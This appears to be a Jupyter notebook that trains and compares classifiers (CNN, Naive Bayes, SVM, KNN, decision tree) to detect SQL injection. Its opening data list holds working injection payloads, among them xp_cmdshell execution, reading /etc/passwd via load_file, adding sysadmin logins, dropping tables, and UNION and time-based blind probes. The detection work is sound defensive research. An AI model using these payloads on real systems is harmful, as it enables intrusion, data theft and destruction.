 '1; ( load_file ( char ( 47,101,116,99,47,112,97,115,115,119,100  )  )   ) ,1,1,1;',
 "' and 1 =  (  if  (  (  load_file ( char ( 110,46,101,120,116  )  )  <>char ( 39,39  )  )  ,1,0  )  )  ;",
 "'; exec master..xp_cmdshell 'ping 10.10.1.2'--",
 "create user name identified by 'pass123'",
 'create user name identified by pass123 temporary tablespace temp default tablespace users; ',
 "' ; drop table temp --",
 "exec sp_addlogin 'name' , 'password'",
 "exec sp_addsrvrolemember 'name' , 'sysadmin'",
 "insert into mysql.user  ( user, host, password )  values  ( 'name', 'localhost', password ( 'pass123'  )  )  ",
 'grant connect to name; grant resource to name;',
 'insert into users ( login, password, level )  values (  char ( 0x70 )  + char ( 0x65 )  + char ( 0x74 )  + char ( 0x65 )  + char ( 0x72 )  + char ( 0x70 )  + char ( 0x65 )  + char ( 0x74 )  + char ( 0x65 )  + char ( 0x72 ) ,char ( 0x64 ) ',
 "' or 1 = 1 --",
 "' union  ( select @@version )  --",
 "' union  ( select NULL,  ( select @@version  )  )   --",
 "' union  ( select NULL, NULL,  ( select @@version  )  )   --",
 "' union  ( select NULL, NULL, NULL,   ( select @@version  )  )   --",
 "' union  ( select NULL, NULL, NULL, NULL,   ( select @@version  )  )   --",
 "' union  ( select NULL, NULL, NULL, NULL,  NULL,  ( select @@version  )  )   --",
 "'; if not ( substring  (  (  select @@version ) ,25,1 )  <> 0 )  waitfor delay '0:0:2' --",
 "'; if not ( substring  (  (  select @@version ) ,25,1 )  <> 5 )  waitfor delay '0:0:2' --",
 "'; if not ( substring  (  (  select @@version ) ,25,1 )  <> 8 )  waitfor delay '0:0:2' --",
 "'; if not ( substring  (  (  select @@version ) ,24,1 )  <> 1 )  waitfor delay '0:0:2' --",
 "'; if not ( select system_user )  <> 'sa' waitfor delay '0:0:2' --",
 "'; if is_srvrolemember ( 'sysadmin' )  > 0 waitfor delay '0:0:2' -- ",
 "'; if not  (  (  select serverproperty ( 'isintegratedsecurityonly'  )  )   <> 1 )  waitfor delay '0:0:2' --",
 "'; if not  (  (  select serverproperty ( 'isintegratedsecurityonly'  )  )   <> 0 )  waitfor delay '0:0:2' --",
 ' select * from users where id = 1 or  ( \\ )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( \\+ )  = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 or  ( \\+ )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( $+ )  = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or  ( $+ )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\.<\\ or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\.<1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\.<1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\.<\\ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\.<$ or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\.<$ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\.<  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 ||1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1   or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\+<\\ or 1 = 1 -- 1',
 ' select * from users where id = 1 or  1<@ = 1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or \\+<\\ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\+<$ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or 1&@# = 1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or $ . = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $ 1 = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or $ 1 = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $<\\ or 1 = 1 -- 1',
 ' select * from users where id = 1 or $<\\. or 1 = 1 -- 1',
 ' select * from users where id = 1 or $<\\. union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $<\\ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $+<\\ or 1 = 1 -- 1',
 ' select * from users where id = 1 or $+<1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $+<\\ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or $+<$ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<\\. or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\<\\. union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\<1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<\\ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<\\ union select null,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<$ or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\<$ union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or \\<  = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or \\<  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or !<@ or 1 = 1 -- 1',
 ' select * from users where id = 1 or !<@ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or @`\\` union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or  @$# = 1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1 or @<@ = 1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1 + ( \\ )  or 1 = 1 -- 1',
 ' select * from users where id = 1 + ( \\ )  union select null,@@VERSION -- 1',
 ' select * from users where id = 1.&&1 union select 1,version (  )  -- 1',
 ' select * from users where id = 1. or 1 = 1 -- 1',
 ' select * from users where id = 1.&&@ union select 1,version (  )  -- 1',
 ' select * from users where id = 1 +  ( \\. )  or 1 = 1 -- 1',
 ' select * from users where id = 1 +  ( \\. )  union select null,@@VERSION -- 1',
 ' select * from users where id = 1.  union select 1,version (  )  -- 1',
 ' select * from users where id = 1. union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1.  union select version (  ) ,version (  )  -- 1',
 ' select * from users where id = 1. union select null,version (  )  -- 1',
 ' select * from users where id = 1 +\\. union select null,@@VERSION -- 1',
 ' select * from users where id = 1. union select null,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1. <@ or 1 = 1 -- 1',
 ' select * from users where id = 1.<@. or 1 = 1 -- 1',
 ' select * from users where id = 1.<@. union select 1,version (  )  -- 1',
 ' select * from users where id = 1.*1 or 1 = 1 -- 1',
 ' select * from users where id = 1.*1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1.<1# union select 1,version (  )  -- 1',
 ' select * from users where id = 1. <@ union select 1,version (  )  -- 1',
 ' select * from users where id = 1. <@ union select version (  ) ,version (  )  -- 1',
 ' select * from users where id = 1.*\\ union select null,@@VERSION -- 1',
 ' select * from users where id = 1.<@$ or 1 = 1 -- 1',
 ' select * from users where id = 1.<@$ union select 1,version (  )  -- 1',
 ' select * from users where id = 1.%@ or 1 = 1 -- 1',
 ' select * from users where id = 1.%@ union select 1,version (  )  -- 1',
 ' select * from users where id = 11||1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 +1 or 1 = 1 -- 1',

#### Combination of benign an attack data

In [160]:
import pandas as pd

In [263]:
# give labels to sql data

values=[]
for i in all_sqli_sentence:
    values.append((i,1))

In [264]:
# give labels to benign data

for i in data:
    values.append((i,0))

In [265]:
len(all_sqli_sentence)+len(data)

4200

In [266]:
len(values)

4200

In [267]:
for i in benign_sentence:
    values.append((i,0))

In [268]:
len(values)

4944

In [269]:
for i in sqli_data:
    values.append((i,1))

In [270]:
len(values)

5234

In [169]:
values[1]

("a' ", 1)

In [170]:
# convert to dataframe

df=pd.DataFrame(values,columns=['Sentence','Label'])

In [171]:
df.head()

          Sentence  Label
0                a      1
1              a'       1
2            a' --      1
3  a' or 1 = 1; --      1
4                @      1

### Save data as csv

In [172]:
df.to_csv('sqli.csv', index=False, encoding='utf-16')

In [173]:
df=pd.read_csv('sqli.csv',encoding='utf-16')

In [174]:
# vectorization of data

from sklearn.feature_extraction.text import CountVectorizer
vectorizer = CountVectorizer( min_df=2, max_df=0.7, max_features=4096, stop_words=stopwords.words('english'))
posts = vectorizer.fit_transform(df['Sentence'].values.astype('U')).toarray()

In [175]:
posts.shape

(5234, 4096)

In [176]:
posts.shape=(5234,64,64,1)

In [177]:
posts.shape

(5234, 64, 64, 1)

In [178]:
X=posts

In [179]:
y=df['Label']

In [180]:
from sklearn.model_selection import train_test_split

In [181]:
# split train test data

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)

In [190]:
trainX=X_train.copy()
trainX.shape=(X_train.shape[0],trainX.shape[1]*trainX.shape[2])
testX=X_test.copy()
testX.shape=(testX.shape[0],testX.shape[1]*testX.shape[2])

#### Naive Bayes

In [271]:
from sklearn.naive_bayes import GaussianNB

gnb = GaussianNB()

gnb.fit(trainX, y_train)

pred_gnb = gnb.predict(testX)

#### Support Vector Machine

In [188]:
# SVM
from sklearn.svm import SVC
clf = SVC(gamma='auto')
clf.fit(trainX, y_train)
pred_svm=clf.predict(testX)

SVC(C=1.0, break_ties=False, cache_size=200, class_weight=None, coef0=0.0,
    decision_function_shape='ovr', degree=3, gamma='auto', kernel='rbf',
    max_iter=-1, probability=False, random_state=None, shrinking=True,
    tol=0.001, verbose=False)

#### K Nearest Neighbor

In [272]:
from sklearn.neighbors import KNeighborsClassifier

neigh = KNeighborsClassifier(n_neighbors=3)
neigh.fit(trainX, y_train)

pred_knn = neigh.predict(testX)

#### Decision Tree

In [275]:
from sklearn import tree

dt = tree.DecisionTreeClassifier()
dt = dt.fit(trainX, y_train)

pred_dt = dt.predict(testX)

In [189]:
X_train.shape

(4187, 64, 64, 1)

#### CNN

In [183]:
import tensorflow as tf
from keras.models import Sequential
from keras import layers
from keras.preprocessing.text import Tokenizer
from keras.wrappers.scikit_learn import KerasClassifier

In [184]:
model=tf.keras.models.Sequential([
    
    tf.keras.layers.Conv2D(64, (3,3), activation=tf.nn.relu, input_shape=(64,64,1)),
    tf.keras.layers.MaxPooling2D(2,2),
    
    tf.keras.layers.Conv2D(128,(3,3), activation=tf.nn.relu),
    tf.keras.layers.MaxPooling2D(2,2),
    
    tf.keras.layers.Conv2D(256,(3,3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2,2),
    
    tf.keras.layers.Flatten(),
    tf.keras.layers.Dense(256, activation='relu'),
    tf.keras.layers.Dense(128,activation='relu'),
    tf.keras.layers.Dense(64, activation=tf.nn.relu),
    tf.keras.layers.Dense(1, activation='sigmoid')
])

In [81]:
model.compile(loss='binary_crossentropy', 
              optimizer='adam', 
              metrics=['accuracy'])
model.summary()

Model: "sequential"
_________________________________________________________________
Layer (type)                 Output Shape              Param #
=================================================================
conv2d (Conv2D)              (None, 62, 62, 64)        640
_________________________________________________________________
max_pooling2d (MaxPooling2D) (None, 31, 31, 64)        0
_________________________________________________________________
conv2d_1 (Conv2D)            (None, 29, 29, 128)       73856
_________________________________________________________________
max_pooling2d_1 (MaxPooling2 (None, 14, 14, 128)       0
_________________________________________________________________
conv2d_2 (Conv2D)            (None, 12, 12, 256)       295168
_________________________________________________________________
max_pooling2d_2 (MaxPooling2 (None, 6, 6, 256)         0
_________________________________________________________________
flatten (Flatten)            (None, 9216)              0
_________________________________________________________________
dense (Dense)                (None, 256)               2359552
_________________________________________________________________
dense_1 (Dense)              (None, 128)               32896
_________________________________________________________________
dense_2 (Dense)              (None, 64)                8256
_________________________________________________________________
dense_3 (Dense)              (None, 1)                 65
=================================================================
Total params: 2,770,433
Trainable params: 2,770,433
Non-trainable params: 0
_________________________________________________________________

In [82]:
# import tensorflow as tf

# class myCallback(tf.keras.callbacks.Callback):
#     def on_epoch_end(self, epoch, logs={}):
#         if(logs.get('acc')>0.98):
#             print( "Reached 99.8% accuracy so cancelling training!")
#             self.model.stop_training=True
# callbacks = myCallback()

In [83]:
classifier_nn = model.fit(X_train,y_train,
                    epochs=10,
                    verbose=True,
                    validation_data=(X_test, y_test),
                    batch_size=128)

Train on 4187 samples, validate on 1047 samples
Epoch 1/10
4187/4187 [==============================] - 27s 6ms/sample - loss: 0.3400 - accuracy: 0.8283 - val_loss: 0.2561 - val_accuracy: 0.8902
Epoch 2/10
4187/4187 [==============================] - 26s 6ms/sample - loss: 0.1951 - accuracy: 0.9016 - val_loss: 0.2073 - val_accuracy: 0.9074
Epoch 3/10
4187/4187 [==============================] - 26s 6ms/sample - loss: 0.1652 - accuracy: 0.9157 - val_loss: 0.2002 - val_accuracy: 0.9179
Epoch 4/10
4187/4187 [==============================] - 27s 6ms/sample - loss: 0.1392 - accuracy: 0.9279 - val_loss: 0.1921 - val_accuracy: 0.9188
Epoch 5/10
4187/4187 [==============================] - 26s 6ms/sample - loss: 0.1278 - accuracy: 0.9331 - val_loss: 0.1804 - val_accuracy: 0.9255
Epoch 6/10
4187/4187 [==============================] - 29s 7ms/sample - loss: 0.1083 - accuracy: 0.9420 - val_loss: 0.2223 - val_accuracy: 0.9217
Epoch 7/10
4187/4187 [==============================] - 28s 7ms/sample - loss: 0.1061 - accuracy: 0.9410 - val_loss: 0.1927 - val_accuracy: 0.9312
Epoch 8/10
4187/4187 [==============================] - 29s 7ms/sample - loss: 0.0968 - accuracy: 0.9498 - val_loss: 0.1798 - val_accuracy: 0.9351
Epoch 9/10
4187/4187 [==============================] - 27s 7ms/sample - loss: 0.0858 - accuracy: 0.9518 - val_loss: 0.2057 - val_accuracy: 0.9389
Epoch 10/10
4187/4187 [==============================] - 26s 6ms/sample - loss: 0.0786 - accuracy: 0.9572 - val_loss: 0.2326 - val_accuracy: 0.9351

In [84]:
pred=model.predict(X_test)

In [85]:
for i in range(len(pred)):
    if pred[i]>0.5:
        pred[i]=1
    elif pred[i]<=0.5:
        pred[i]=0

In [86]:
from sklearn.metrics import accuracy_score

In [87]:
accuracy_score(y_test,pred)

0.9350525310410697

In [213]:
for i,j in zip(y_test,pred):
    print(i==j)

[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[False]
[False]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[False]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[False]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[False]
[ True]
[ True]
[ True]
[ True]
[ True]
[ True]

#### Saving Model

In [214]:
from keras.models import load_model
import pickle

model.save('my_model_cnn.h5')
with open('vectorizer_cnn', 'wb') as fin:
    pickle.dump(vectorizer, fin)

### Confusion Matrix
#### Assumption:
1. SQLI attack type is positive

In [88]:
def accuracy_function(tp,tn,fp,fn):
    
    accuracy = (tp+tn) / (tp+tn+fp+fn)
    
    return accuracy

In [89]:
def precision_function(tp,fp):
    
    precision = tp / (tp+fp)
    
    return precision

In [90]:
def recall_function(tp,fn):
    
    recall=tp / (tp+fn)
    
    return recall

In [91]:
def confusion_matrix(truth,predicted):
    
    true_positive = 0
    true_negative = 0
    false_positive = 0
    false_negative = 0
    
    for true,pred in zip(truth,predicted):
        
        if true == 1:
            if pred == true:
                true_positive += 1
            elif pred != true:
                false_negative += 1

        elif true == 0:
            if pred == true:
                true_negative += 1
            elif pred != true:
                false_positive += 1
            
    accuracy=accuracy_function(true_positive, true_negative, false_positive, false_negative)
    precision=precision_function(true_positive, false_positive)
    recall=recall_function(true_positive, false_negative)
    
    return (accuracy,
            precision,
           recall)

In [92]:
accuracy,precision,recall=confusion_matrix(y_test,pred)

In [192]:
print(" For CNN \n Accuracy : {0} \n Precision : {1} \n Recall : {2}".format(accuracy, precision, recall))

 For CNN
 Accuracy : 0.9350525310410697
 Precision : 0.8498498498498499
 Recall : 0.9401993355481728

In [276]:
accuracy,precision,recall=confusion_matrix(y_test,pred_gnb)
print(" For Naive Bayes Accuracy : {0} \n Precision : {1} \n Recall : {2}".format(accuracy, precision, recall))

 For Naive Bayes Accuracy : 0.9531996179560649
 Precision : 0.8727810650887574
 Recall : 0.9800664451827242

In [193]:
accuracy,precision,recall=confusion_matrix(y_test,pred_svm)
print(" For SVM Accuracy : {0} \n Precision : {1} \n Recall : {2}".format(accuracy, precision, recall))

 For SVM Accuracy : 0.7831900668576887
 Precision : 1.0
 Recall : 0.24584717607973422

In [277]:
accuracy,precision,recall=confusion_matrix(y_test,pred_knn)
print(" For KNN Accuracy : {0} \n Precision : {1} \n Recall : {2}".format(accuracy, precision, recall))

 For KNN Accuracy : 0.6542502387774594
 Precision : 0.4518167456556082
 Recall : 0.9501661129568106

In [278]:
accuracy,precision,recall=confusion_matrix(y_test,pred_dt)
print(" For Decision Tree Accuracy : {0} \n Precision : {1} \n Recall : {2}".format(accuracy, precision, recall))

 For Decision Tree Accuracy : 0.8414517669531996
 Precision : 0.6490066225165563
 Recall : 0.9767441860465116

### Classifying user data

     This cell is also in file user_Data_predict.py No need to run this cell

In [223]:

import keras
from keras.models import load_model
import pickle


mymodel = tf.keras.models.load_model('my_model_cnn.h5')
myvectorizer = pickle.load(open("vectorizer_cnn", 'rb'))




def clean_data(input_val):

    input_val=input_val.replace('\n', '')
    input_val=input_val.replace('%20', ' ')
    input_val=input_val.replace('=', ' = ')
    input_val=input_val.replace('((', ' (( ')
    input_val=input_val.replace('))', ' )) ')
    input_val=input_val.replace('(', ' ( ')
    input_val=input_val.replace(')', ' ) ')
    input_val=input_val.replace('1 ', 'numeric')
    input_val=input_val.replace(' 1', 'numeric')
    input_val=input_val.replace("'1 ", "'numeric ")
    input_val=input_val.replace(" 1'", " numeric'")
    input_val=input_val.replace('1,', 'numeric,')
    input_val=input_val.replace(" 2 ", " numeric ")
    input_val=input_val.replace(' 3 ', ' numeric ')
    input_val=input_val.replace(' 3--', ' numeric--')
    input_val=input_val.replace(" 4 ", ' numeric ')
    input_val=input_val.replace(" 5 ", ' numeric ')
    input_val=input_val.replace(' 6 ', ' numeric ')
    input_val=input_val.replace(" 7 ", ' numeric ')
    input_val=input_val.replace(" 8 ", ' numeric ')
    input_val=input_val.replace('1234', ' numeric ')
    input_val=input_val.replace("22", ' numeric ')
    input_val=input_val.replace(" 8 ", ' numeric ')
    input_val=input_val.replace(" 200 ", ' numeric ')
    input_val=input_val.replace("23 ", ' numeric ')
    input_val=input_val.replace('"1', '"numeric')
    input_val=input_val.replace('1"', '"numeric')
    input_val=input_val.replace("7659", 'numeric')
    input_val=input_val.replace(" 37 ", ' numeric ')
    input_val=input_val.replace(" 45 ", ' numeric ')

    return input_val








def predict_sqli_attack():
    
    repeat=True
    
    beautify=''
    for i in range(20):
        beautify+= "="

    print(beautify) 
    input_val=input("Give me some data to work on : ")
    print(beautify)

    
    if input_val== '0':
        repeat=False
    
    

    input_val=clean_data(input_val)
    input_val=[input_val]



    input_val=myvectorizer.transform(input_val).toarray()
    
    input_val.shape=(1,64,64,1)

    result=mymodel.predict(input_val)


    print(beautify)
    
    
    if repeat == True:
        
        if result>0.5:
            print("ALERT :::: This can be SQL injection")


        elif result<=0.5:
            print("It seems to be safe")
            
        print(beautify)
            
        predict_sqli_attack()
            
    elif repeat == False:
        print( " Good Bye ")

In [224]:
# check for sql injection cheat sheet





predict_sqli_attack()

====================
Give me some data to work on : AND (SELECT version()) LIKE "5%"--
====================
====================
ALERT :::: This can be SQL injection
====================
====================
Give me some data to work on : TABLE_NAME="table1" LIMIT 0,1)))--
====================
====================
ALERT :::: This can be SQL injection
====================
====================
